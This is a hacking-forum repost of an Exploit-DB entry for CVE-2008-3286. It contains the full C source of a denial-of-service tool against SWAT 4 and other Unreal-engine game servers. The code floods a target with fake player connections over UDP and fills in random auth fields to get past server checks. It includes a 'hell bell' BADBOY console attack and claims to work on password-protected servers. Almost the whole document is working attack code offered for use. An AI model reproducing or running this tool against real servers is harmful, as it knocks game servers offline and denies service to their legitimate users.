Exploit SWAT 4 - Multiple Denial of Service Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32086
Проверка EDB
  1. Пройдено
Автор
LUIGI AURIEMMA
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
cve-2008-3286
Дата публикации
2008-07-20
C:
// source: https://www.securityfocus.com/bid/30299/info

SWAT 4 is prone to multiple remote denial-of-service vulnerabilities because the application fails to properly handle certain input.

An attacker may exploit these issues to crash the affected application, denying service to legitimate users.

SWAT 4 1.1 is vulnerable; other versions may also be affected. 

/*
    Copyright 2008 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <ctype.h>
#include <time.h>
#include "rwbits.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1.1"
#define PORT        7777
#define BUFFSZ      4096     // the max supported is 576
#define HELLBELL    "BADBOY " \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a" \
                    "\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a\a"

#define UT2_QUERY   "\x79\x00\x00\x00\x00"  // not used
#define GS1_QUERY   "\\info\\"              // \status\ returns 3 packets, I'm too lazy to handle all of them
#define GS2_QUERY   "\xfe\xfd\x00" "\x00\x00\x00\x00"                    "\xff\x00\x00" "\x00"
#define GS3_QUERY   "\xfe\xfd\x09" "\x00\x00\x00\x00"
#define GS3_QUERYX  "\xfe\xfd\x00" "\x00\x00\x00\x00" "\x00\x00\x00\x00" "\xff\x00\x00" "\x00"



void fake_players_socket(int sd) {  // simple to add function for not closing sockets
    #define MAXFAKESOCKS    64
    static int  socks[MAXFAKESOCKS],
                socksp,
                init    = 1;
    int         i;

    if(init || (sd < 0)) {
        for(i = 0; i < MAXFAKESOCKS; i++) socks[i] = -1;
        socksp = 0;
        init   = 0;
        return;
    }
    if(socksp >= MAXFAKESOCKS) socksp = 0;
    if(socks[socksp] >= 0) close(socks[socksp]);
    socks[socksp] = sd;
    socksp++;
}
void activate_fix(int *fix);
int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg);
u8 *rndhash(int size);
int unreal_info(u8 *buff, struct sockaddr_in *peer);
int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
void fgetz(u8 *data, int len);
int calc_authresp(int num);
int write_unrnum(int num, u8 *buff, int bits);
int read_unrnum(int *num, u8 *buff, int bits);
int write_unrser(int num, u8 *buff, int bits, int max);
u8 *unreal_parse_pck(u8 *buff, int size, int *chall);
int unreal_build_pck(u8 *buff, int pck, ...);
int read_unreal_index(u8 *index_num, int *ret);
int write_unreal_index(int number, u8 *index_num);
int read_bitmem(u8 *in, int inlen, u8 *out, int bits);
int write_bitmem(u8 *in, int inlen, u8 *out, int bits);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int     aafix           = 0,    // America's Army uses 0x800 instead of 0x3ff
        u3fix           = 0,    // Unreal 3 no longer uses index numbers
        rvfix           = 0,    // RavenShiel uses 0x50f instead of 0x3ff (this is useless since it's enough compatible with AA)
        pariahfix       = 0,    // Pariah
        movfix          = 0,    // Men of Valor
        //khgfix          = 0,    // Klingon Honor Guard uses readbits 16 1 9 16 3 and 12 instead of index numbers
        // unreal1fix, similar to above... not needed to support at the moment
        verbose         = 0,
        challenge_fix   = 0,
        hex_challenge   = 0,
        force_team      = 0,
        force_fix       = 0,
        send_verbose    = 0,
        fast_connect    = 1,
        first_time      = 1;
u8      *gamestatefix[] = {
        "",     // none
            // the order of the hash of GAMESTATE checked in memory is 77778888555566661111222233334444
            //the second part of the GAMESTATE hash is the MD5 of "SCR3W3DD@P00CH" and the MD5 of the file (for example SwatGame.u)
            // Swat4 requires 32 successful GAMESTATEs, it's enough to send the same one 32 times,
            // but at the moment my tool doesn't support the sending of more packets
        "GAMESTATE FA1F998D4D4C2E5F492B79FF1D58488E5e2b7c57161e65909c8c7b01923aa4c4",   // UT2XMP demo
        "GAMESTATE 520996A03FACE2BE4FF9A24F17158B3B7c07dc2b72044ef0e6278707e9e8b0f6",   // UT2003
        // "GAMESTATE D2ECC882E8945E68413DDF3DCB7A1BBEfe95745de189869e61331593a64f33de",   // SWAT4 
        NULL
        };



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        peerl;
    int     i,
            sd,
            len,
            pck,
            ver,
            chall,
            onlyone         = 0,
            infoquery       = 1,
            sendauth        = 0,
            gamestatefixes  = 0,
            random_username = 0,
            force_closesock = 0;
    u16     port            = PORT;
    u8      buff[BUFFSZ],
            hello[BUFFSZ]   = "",
            auth[BUFFSZ]    = "",
            login[BUFFSZ]   = "",
            hellover[64]    = "",
            pass[64]        = "",
            tmpchall[12],
            *cmd_only       = NULL,
            *cmd_plus       = "",
            *login_plus     = "",
            *errmsg,
            *host,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Unreal engine basic client and Fake Players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <host> <port>\n"
            "\n"
            "Options:\n"
            "-c \"C\"  send only the custom command C\n"
            "-C \"C\"  send the custom command C plus the others needed to join\n"
            "-l \"S\"  add a custom URL string S to the LOGIN command, for example:\n"
            "        -l \"Index.ut2?Name=player?Class=EnginePawn?Character=Jakob?team=1\"\n"
            "        -l \"?Name=player?UserName=UserName?MAC=\"\n"
            //"        -l \"Entry.aao?Name=Recruit?Class=AGP_Characters.AGP_Character?team=255?UserName=UserName?MAC=\"\n"
            "-f      use the full method (HELLO + LOGIN and so on), needed with some games\n"
            "        of the Unreal 1 engine to avoid the crash of the server\n"
            //"-u      send a LOGIN command with a random UserName field (for America's Army)\n" AUTOMATIC!!!
            //"-a      send the AUTH command\n" AUTOMATIC!!!
            "-i      do not query the server for informations and for hostport\n"
            "-b      Windows dedicated server hell bell attack through the BADBOY command\n"
            "-v      verbose mode, show all the commands received from the server\n"
            "-V      show all the commands sent by this tool\n"
            "-1      only one fake player, debug\n"
            "-x N    force the activation of a specific compatibility fix, where N is for:\n"
            "        1 = America's Army     2 = Unreal 3 engine    3 = Raven Shield\n"
            "        4 = Pariah             5 = Men of Valor\n"
            "\n"
            "works also with servers protected by password without knowing the keyword!\n"
            "should work with almost any game based on the Unreal engine (1, 2 and 3)\n"
            "\n", argv[0]);
        exit(1);
    }

    argc -= 2;
    for(i = 1; i < argc; i++) {
        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
            printf("\nError: wrong argument (%s)\n", argv[i]);
            exit(1);
        }
        switch(argv[i][1]) {
            case 'v': {
                verbose         = 1;
                break;
            }
            case 'V': {
                send_verbose    = 1;
                break;
            }
            case 'f': {
                fast_connect    = 0;
                break;
            }
            case 'c': {
                cmd_only        = argv[++i];
                break;
            }
            case 'C': {
                cmd_plus        = argv[++i];
                break;
            }
            case 'l': {
                login_plus      = argv[++i];
                fast_connect    = 0;
                break;
            }
            case '1': {
                onlyone         = 1;
                break;
            }
            case 'i': {
                infoquery       = 0;
                break;
            }
            case 'a': {
                sendauth        = 1;
                break;
            }
            case 'b': {
                cmd_only        = HELLBELL;
                force_closesock = 1;
                break;
            }
            case 'u': {
                random_username = 1;
                fast_connect    = 0;
                break;
            }
            case 'x': {
                force_fix       = atoi(argv[++i]);
                break;
            }
            default: {
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }

    host = argv[argc];
    port = atoi(argv[argc + 1]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    if(infoquery && (ntohs(peer.sin_port) != 7777)) {
        ver = unreal_info(buff, &peer);
        if(ver) sprintf(hellover, "MINVER=%d VER=%d", ver, ver);
    }

        /* full list of parameters and values parsed by various games which use the Unreal engine
        USERFLAG (number)
        HELLO
            MINVER=
            VER=
        AUTH
            HASH=
            RESPONSE=
            USERNAME=
            PASSWORD=
            GM=
        NETSPEED (number >= 1800)
        HAVE
            GUID=
            GEN=
        SKIP
            GUID=
        LOGIN
            RESPONSE=
            URL=
        JOIN
        BADBOY (followed by the string visualized in the console)
        PETE
            PKT=
            PKG=
        REPEAT
        OPENVOICE (number)
            // UT2003
        CRITOBJCNT (number, similar to PETE)
        GAMESTATE (ID)
            NAME=
            // SWAT4
        GAMESPYRESPONSE
            RS=
        GAMESPYSTATRESPONSE
            PID=
            RS=
        VERIFYCONTENT
            FILE=
            MD5=
        GAMECONFIGCOUNT (number)
        GAMECONFIG
            CONFIGFILE=
            CONFIGMD5=
            // Warpath and Pariah
        JOINSPLIT
            GAMEPAD=
            GUESTNUM=
        DISABLESPLIT
            GAMEPAD=
        EPIC (hash)
            // Raven Shield
        SERVERPING
        ARMPATCH
            // UT3
        DEBUG
        ABORT
            GUID=
        JOINSPLIT
        */
        // generic in-game commands: open namecount start map servertravel say disconnect

    printf("\n- start attack:\n");

    if(force_fix) {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        errmsg = unreal_parse_pck("\0\0", 0, NULL);
        goto handle_error_message;
    }

    for(;;) {
        pck = 0;
        printf("\n  Player: ");

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        do {
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(struct sockaddr_in)) < 0);

        if(!fast_connect || u3fix || movfix) {    // Unreal 3 requires the LOGIN packet, while MOV crashes!
            sprintf(hello, "HELLO %sREVISION=0 %s", u3fix ? "P=1 " : "", hellover);

            len = unreal_build_pck(buff, pck++,
                hello,
                NULL);

            len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, &chall, &errmsg);
            if(len < 0) goto handle_error_message;

            //sprintf(login, "LOGIN RESPONSE=%i URL=Index.ut2?Name=player?Class=EnginePawn?Character=Jakob?team=1%s%s", chall, pass[0] ? "?password=" : "", pass);
            sprintf(tmpchall, hex_challenge ? "%08X" : "%i", chall);    // I don't know if this is right, seems that U3 doesn't check the challenge!
            sprintf(login, "LOGIN RESPONSE=%s URL=%s%s%s%s", tmpchall, login_plus, force_team ? "?Team=1" : "", pass[0] ? "?password=" : "", pass);
            if(random_username) sprintf(login + strlen(login), "?UserName=%s", rndhash(5));
        }

        if(sendauth) {
            sprintf(auth,  "AUTH HASH=%s GM=%s USERNAME=%s PASSWORD=%s", rndhash(16), rndhash(66), rndhash(4), rndhash(16));
        }

        if(cmd_only) {
            len = unreal_build_pck(buff, pck++,
                cmd_only,
                NULL);
        } else {
            len = unreal_build_pck(buff, pck++,
                auth,   // causes only problems!
                login,
                //"NETSPEED 1800",    // useless
                "PETE PKT=1 PKG=1",
                "REPEAT",
                "CRITOBJCNT 1",
                gamestatefix[gamestatefixes],
                cmd_plus,
                "JOIN",
                NULL);
        }
        if(len > BUFFSZ) {
            printf("\nError: your packet is too big\n");
            exit(1);
        }
        len = unreal_send_recv(sd, buff, len, buff, BUFFSZ, &peer, NULL, &errmsg);
        if(len < 0) goto handle_error_message;

        if(onlyone) {
            if(verbose) {
                for(;;) {   // show any other incoming message
                    len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 0);
                    if(len < 60) break;  // break if too small
                    errmsg = unreal_parse_pck(buff, len, NULL);
                    if(errmsg) break;
                }
            }
            printf("\n- done\n");
            exit(1);
        }

        if(force_closesock) {
            close(sd);
        } else {
            fake_players_socket(sd);
        }
        continue;

handle_error_message:
        close(sd);
        if(!errmsg) continue;
        if(strstr(errmsg, "UPGRADE")) {
            p = strstr(errmsg, "MINVER");   // UPGRADE MINVER= VER=
            if(!p) exit(1);
            strncpy(hellover, p, sizeof(hellover));
            hellover[sizeof(hellover) - 1] = 0;
        } else if(strstr(errmsg, "SERVERFULL") || stristr(errmsg, "capacity") || stristr(errmsg, "MaxedOutMessage") || stristr(errmsg, "players")) {
            printf(" server full ");
            for(i = 3; i; i--) {
                printf("%d\b", i);
                sleep(ONESEC);
            }
        } else if(strstr(errmsg, "NEEDPW") || strstr(errmsg, "WRONGPW") || stristr(errmsg, "password") || stristr(errmsg, "PassWd")) {
            printf("\n- server is protected with password, insert the keyword: ");
            fgetz(pass, sizeof(pass));
        } else if(strstr(errmsg, "BRAWL")) {
            gamestatefixes++;
            if(!gamestatefix[gamestatefixes]) {
                printf("\nError: this game needs one or more GAMESTATE commands not implemented\n");
                exit(1);
            }
            printf("\n- %s", gamestatefix[gamestatefixes]);
        } else if(stristr(errmsg, "Username")) {
            if(random_username) exit(1);
            printf("\n- activate random UserName in the LOGIN command");
            random_username = 1;
            fast_connect    = 0;
        } else if(stristr(errmsg, "Could not find team")) {
            if(force_team) exit(1);
            printf("\n- activate team fix");
            force_team      = 1;
            fast_connect    = 0;
        } else if(stristr(errmsg, "stats")) {
            if(sendauth) exit(1);
            sendauth        = 1;
        } else if(stristr(errmsg, "CHALLENGE")) {
            challenge_fix++;
            if(challenge_fix == 1) {
                printf("\n- activate the Frontline Fuel of War challenge fix");
            } else if(!hex_challenge) {
                printf("\n- activate the hexadecimal challenge fix");
                challenge_fix = 0;
                hex_challenge = 1;
            } else {
                printf("\n"
                "Error: seems that this game requires a specific challenge-response algorithm\n"
                "\n");
                exit(1);
            }
        } else if(!strcmp(errmsg, "NOFIX")) {
            printf("\n- activate full connect without compatibility fixes");
            activate_fix(NULL);
        } else if(!strcmp(errmsg, "AAFIX")) {
            printf("\n- activate the America's Army compatibility");
            activate_fix(&aafix);
        } else if(!strcmp(errmsg, "U3FIX")) {
            printf("\n- activate the Unreal 3 engine compatibility");
            activate_fix(&u3fix);
        } else if(!strcmp(errmsg, "RVFIX")) {
            printf("\n- activate the Raven Shield compatibility");
            activate_fix(&rvfix);
        } else if(!strcmp(errmsg, "PARIAHFIX")) {
            printf("\n- activate the Pariah/Warpath compatibility");
            activate_fix(&pariahfix);
        } else if(!strcmp(errmsg, "MOVFIX")) {
            printf("\n- activate the Men of Valor compatibility");
            activate_fix(&movfix);
        } else {
            printf("\nError: %s\n", errmsg);
            exit(1);
        }
    }
    return(0);
}



void activate_fix(int *fix) {
    aafix       = 0;
    u3fix       = 0;
    rvfix       = 0;
    pariahfix   = 0;
    movfix      = 0;
    if(fix) *fix = 1;
}



int unreal_send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int *chall, u8 **errmsg) {
    int     len;

    len = send_recv(sd, in, insz, out, outsz, peer, first_time);
    if(len < 0) {
        if(len == -1) std_err();
        printf(" players_per_IP limit or timed out ");
        sleep(ONESEC);
        *errmsg = NULL;
        return(-1);
    }
    if(first_time) first_time = 0;

#ifdef DUMPPCK
    static  int num = 0;
    FILE    *fd;
    char    fname[64];
    sprintf(fname, "unrealfp_pck.%03d", num++);
    fd = fopen(fname, "wb");
    if(!fd) std_err();
    fwrite(out, 1, len, fd);
    fclose(fd);
#endif

    *errmsg = unreal_parse_pck(out, len, chall);
    if(*errmsg) return(-1);
    return(len);
}



u8 *rndhash(int size) {
    static u32  rnd = 0;
    static int  sel = 0;
    static u8   out[4][256];
    static const u8 hex[16] = "0123456789abcdef";
    int         i;
    u8          *ret,
                *p;

    if(!rnd) rnd = ~time(NULL);

    ret = out[sel++ & 3];
    p = ret;
    for(i = 0; i < size; i++) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p++ = hex[(rnd & 0xff) >> 4];
        *p++ = hex[(rnd & 0xff) & 15];
    }
    *p = 0;
    return(ret);
}



int unreal_info(u8 *buff, struct sockaddr_in *peer) {
    u32     chall;
    int     sd,
            len,
            type,
            retver      = 0;
    u8      gs3[32],
            *gamever    = NULL,
            *hostport   = NULL;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    printf("\n- send info queries\n");
          send_recv(sd, GS1_QUERY, sizeof(GS1_QUERY) - 1, NULL, 0,      peer, 0);
          send_recv(sd, GS2_QUERY, sizeof(GS2_QUERY) - 1, NULL, 0,      peer, 0);
          send_recv(sd, GS3_QUERY, sizeof(GS3_QUERY) - 1, NULL, 0,      peer, 0);
    len = send_recv(sd, NULL,      0,                     buff, BUFFSZ, peer, 0);
    if(len < 0) goto quit;
    if(buff[0] == '\\') {
        type = 1;
    } else {
        if(len < 8) {
            type = 2;
            len = send_recv(sd, NULL,  0,                    buff, BUFFSZ, peer, 0);
            if(len < 0) goto quit;
        } else {
            type = 3;
            memcpy(gs3, GS3_QUERYX, sizeof(GS3_QUERYX) - 1);
            chall = atoi(buff + 5);
            gs3[7]  = chall >> 24;
            gs3[8]  = chall >> 16;
            gs3[9]  = chall >>  8;
            gs3[10] = chall;
            len = send_recv(sd, gs3, sizeof(GS3_QUERYX) - 1, buff, BUFFSZ, peer, 0);
            if(len < 0) goto quit;
        }
    }

    printf("\n- handle reply:\n");
    gs_handle_info(buff, len,
        (type == 1) ? 1 : 0, (type == 1) ? '\\' : '\0', (type == 1) ? 0 : 5, 0,
        "gamever",  &gamever,
        "hostport", &hostport,
        NULL,       NULL);

    if(gamever) {
        retver = atoi(gamever);
    }
    if(hostport) {
        peer->sin_port = htons(atoi(hostport));
        printf("\n- set hostport %hu\n", ntohs(peer->sin_port));
    }

quit:
    close(sd);
    return(retver);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found  = 0;
    limit  = data + datalen - rear;
    *limit = 0;
    data   += front;
    par    = NULL;
    val    = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %30s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    free(parz);
    free(valz);
    return(found);
}



void fgetz(u8 *data, int len) {
    u8      *p;

    fgets(data, len, stdin);
    for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int calc_authresp(int num) {
    if(challenge_fix == 1) return((num * 178) ^ (num >> 16) ^ (num << 16) ^ 0xfe11ae23);    // FFOW
    return((num * 237) ^ (num >> 16) ^ (num << 16) ^ 0x93fe92ce);
}



int write_unrnum(int num, u8 *buff, int bits) {
    int     len;
    u8      mini[5];

    len = write_unreal_index(num, mini);
    return(write_bitmem(mini, len, buff, bits));
}



int read_unrnum(int *num, u8 *buff, int bits) {
    u8      mini[5];

    *num = 0;
    read_bitmem(buff, 5, mini, bits);
    return(bits + (read_unreal_index(mini, num) << 3));
}



int write_unrser(int num, u8 *buff, int bits, int max) {    // forcompability with core.dll
    int     b;

    for(b = 1; b && (b < max); b <<= 1) {
        bits = write_bits((num & b) ? 1 : 0, 1, buff, bits);
    }
    return(bits);
}



int read_unrser(int *num, u8 *buff, int bits, int max) {    // forcompability with core.dll
    int     b;

    *num = 0;
    for(b = 1; b && (b < max); b <<= 1) {
        if(read_bits(1, buff, bits)) *num += b;
        bits++;
    }
    return(bits);
}



u8 *unreal_parse_pck(u8 *buff, int size, int *chall) {
    static int  retfix  = 0,
                done    = 0;
    static u8   str[BUFFSZ];
    int     b,
            len,
            pck;
    u8      *p;

    if(force_fix) {
        retfix = force_fix - 1; // because then it does retfix++
        force_fix = 0;
    }
    if(chall) *chall = 0;

    read_unrser(&pck, buff, 0, 0x4000);
    if(u3fix) {
        switch(pck) {
            case 0:  b = 52;    break;
            case 1:  b = 67;    break;
            default: b = 52;    break;  // doesn't work with all the packets
        }
    } else if(pariahfix) {
        switch(pck) {
            case 0:  b = 66;    break;
            case 1:  b = 81;    break;
            default: b = 52;    break;  // doesn't work with all the packets
        }
    } else {
        switch(pck) {
            case 0:  b = 67;    break;
            case 1:  b = 82;    break;
            default: b = 52;    break;  // doesn't work with all the packets
        }
    }
    if(aafix)  b++;
    if(rvfix)  b++;
    if(movfix) b++;
    size <<= 3;

    /* correct but not necessary, probably in a future implementation
    b -= 12;
    b = read_unrser(&len, buff, b, 0x1000);
    if((b + len) < size) size = b + len;
    */

    while(b < size) {
        b = read_unrnum(&len, buff, b);
        if((len < 0) || ((b + (len << 3)) > size) || (len > (sizeof(str) - 1))) break; 
        if(!done) done++;
        b = read_bitmem(buff, len, str, b);
        str[len] = 0;
        if(verbose) printf("\n  %s", str);
        if(chall) {
            p = strstr(str, "CHALLENGE=");
            if(p) {
                sscanf(p + 10, hex_challenge ? "%08X" : "%i", chall);
                *chall = calc_authresp(*chall);
            }
        }
        if(strstr(str, "FAIL") || strstr(str, "BRAWL") || strstr(str, "UPGRADE")) {
            return(str);
        }
    }
    if(!done) {
        retfix++;
        if(retfix == 1) return("AAFIX");
        if(retfix == 2) return("U3FIX");
        if(retfix == 3) return("RVFIX");
        if(retfix == 4) return("PARIAHFIX");
        if(retfix == 5) return("MOVFIX");
        if(fast_connect) {
            retfix       = 0;
            fast_connect = 0;
            return("NOFIX");
        }
        printf("\n"
            "Error: seems that this game requires a specific compatibility fix\n"
            "       try to relaunch this tool another time\n"
            "\n");
        exit(1);
    }
    return(NULL);
}



int unreal_build_pck(u8 *buff, int pck, ...) {
    va_list ap;
    int     i,
            b,
            sl,
            len,
            bsize,
            val3ff,
            val8,
            val1000;
    u8      *s;

    //devastation is not supported, it uses 0x4000 1 1 0x4000 1 1 1 1 0x3ff 0x1000 

    val8 = 0x08;
    if(pariahfix) val8 = 0x4;

    val3ff = 0x3ff;
    if(aafix) val3ff = 0x800;
    if(rvfix) val3ff = 0x50f;   // takes the same number of bits of AA... it's useless

    val1000 = 0x1000;
    if(movfix) val1000 = 0x1e00;

    b = 0;
    b = write_unrser(pck, buff, b, 0x4000);
    if(pck == 0) {
        b = write_bits(0, 1, buff, b);
        b = write_bits(1, 1, buff, b);
        b = write_bits(1, 1, buff, b);
        b = write_bits(0, 1, buff, b);
        b = write_bits(1, 1, buff, b);
        b = write_unrser(0, buff, b, val3ff);
    } else if(pck == 1) {
        b = write_bits(1, 1, buff, b);
        b = write_unrser(0, buff, b, 0x4000);
        b = write_bits(0, 1, buff, b);
        b = write_bits(0, 1, buff, b);
        b = write_bits(1, 1, buff, b);
        b = write_unrser(0, buff, b, val3ff);
    } else {   // this one is not supported
        b = write_bits(1, 1, buff, b);
        b = write_bits(0, 1, buff, b);
        b = write_bits(0, 1, buff, b);
        b = write_bits(0, 1, buff, b);
        b = write_bits(0, 1, buff, b);
        b = write_unrser(0, buff, b, val3ff);
    }
    b = write_unrser(pck + 1, buff, b, 0x400);
    b = write_unrser(1, buff, b, val8); // 0 with pck > 1
    bsize = b;

    for(i = 0; i < 2; i++) {  // used only for calculating the packet size! it allows to save an additional buffer
        va_start(ap, pck);
        while((s = va_arg(ap, u8 *))) {
            sl = strlen(s) + 1;
            if(sl == 1) continue;               // skip empty
            if(!i && send_verbose) printf("\n^ %s", s);
            b = write_unrnum(sl, buff, b);
            b = write_bitmem(s, sl, buff, b);   // in reality they are index numbers
        }
        va_end(ap);

        if(!i) b = write_unrser(b - bsize, buff, bsize, val1000);
    }

    b = write_bits(1, 1, buff, b);   // ???

    len = b >> 3;
    if(b & 7) len++;
    if(send_verbose) printf("\n");
    return(len);
}



int read_unreal_index(u8 *index_num, int *ret) {
    int     len,
            result;
    u8      b0 = index_num[0],
            b1 = index_num[1],
            b2 = index_num[2],
            b3 = index_num[3],
            b4 = index_num[4];

    if(u3fix) {
        *ret = b0 | (b1 << 8) | (b2 << 16) | (b3 << 24);
        return(4);
    }

    result = 0;
    len    = 1;
    if(b0 & 0x40) {
        len++;
        if(b1 & 0x80) {
            len++;
            if(b2 & 0x80) {
                len++;
                if(b3 & 0x80) {
                    len++;
                    result = b4;
                }
                result = (result << 7) | (b3 & 0x7f);
            }
            result = (result << 7) | (b2 & 0x7f);
        }
        result = (result << 7) | (b1 & 0x7f);
    }
    result = (result << 6) | (b0 & 0x3f);
    if(b0 & 0x80) result = -result;
    *ret = result;
    return(len);
}



int write_unreal_index(int number, u8 *index_num) {
    int     len,
            sign = 1;

    if(u3fix) {
        index_num[0] = number & 0xff;
        index_num[1] = (number >> 8) & 0xff;
        index_num[2] = (number >> 16) & 0xff;
        index_num[3] = (number >> 24) & 0xff;
        return(4);
    }

    if(number < 0) {
        number = -number;
        sign = -1;
    }

    len = 1;
    index_num[0] = (number & 0x3f);
    if(number >>= 6) {
        index_num[0] += 0x40;
        index_num[1] = (number & 0x7f);
        len++;
        if(number >>= 7) {
            index_num[1] += 0x80;
            index_num[2] = (number & 0x7f);
            len++;
            if(number >>= 7) {
                index_num[2] += 0x80;
                index_num[3] = (number & 0x7f);
                len++;
                if(number >>= 7) {
                    index_num[3] += 0x80;
                    index_num[4] = number;
                    len++;
                }
            }
        }
    }
    if(sign < 0) index_num[0] += 0x80;
    return(len);
}



int read_bitmem(u8 *in, int inlen, u8 *out, int bits) {
    for(; inlen--; out++) {
        *out = read_bits(8, in, bits);
        bits += 8;
    }
    return(bits);
}



int write_bitmem(u8 *in, int inlen, u8 *out, int bits) {
    for(; inlen--; in++) {
        bits = write_bits(*in, 8, out, bits);
    }
    return(bits);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry = 2,
            len;

    if(in) {
        while(retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!out) return(0);
            if(!timeout(sd, 2)) break;
        }
    } else {
        if(timeout(sd, 3) < 0) retry = -1;
    }

    if(retry < 0) {
        if(!err) return(-2);
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif
 
Источник
www.exploit-db.com

Похожие темы